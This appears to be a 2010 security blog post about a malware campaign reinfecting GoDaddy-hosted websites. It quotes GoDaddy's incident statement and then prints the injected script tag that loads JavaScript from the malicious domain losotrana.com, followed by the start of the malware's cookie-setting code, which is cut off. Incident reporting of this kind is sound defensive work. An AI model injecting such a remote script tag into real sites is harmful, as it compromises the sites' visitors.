05.26
Less than 200 accounts hacked this morning as they were able to contain it before it spread. On their own words: Compromised Website Update 5/20/10 – An attack impacting less than 200 accounts happened this morning. Go Daddy is working with other top hosting providers and security experts to gather information to stop to the criminals initiating these exploits.
We have contacted the malware site registrar to remove the offending domain from the Internet, in order to block the attack.
As part of our investigation, Go Daddy has launched a fact-finding tool to collect information about your experience. If you suspect your site was impacted, please fill out our security submission form, located here – http://www.godaddy.com/securityissue.
Thank you, Todd Redfoot, Chief Information Security Officer
Original post: Yes, this is serious. GoDaddy has not fixed their problems yet. Just a few hours ago, we started to notice A LOT of sites reinfected with the “losotrana” malware.
<script src="http://losotrana.com/js.php"></script>source code:/*function setCookie(c_name,value,expiredays){
var exdate=new Date();
exdate.setDate(exdate.getDate()+expiredays);
document.cookie=c_name+ "=" +escape(value)+
((expiredays==null) ? "" : ";expires="+exdate.toGMTString());
}function g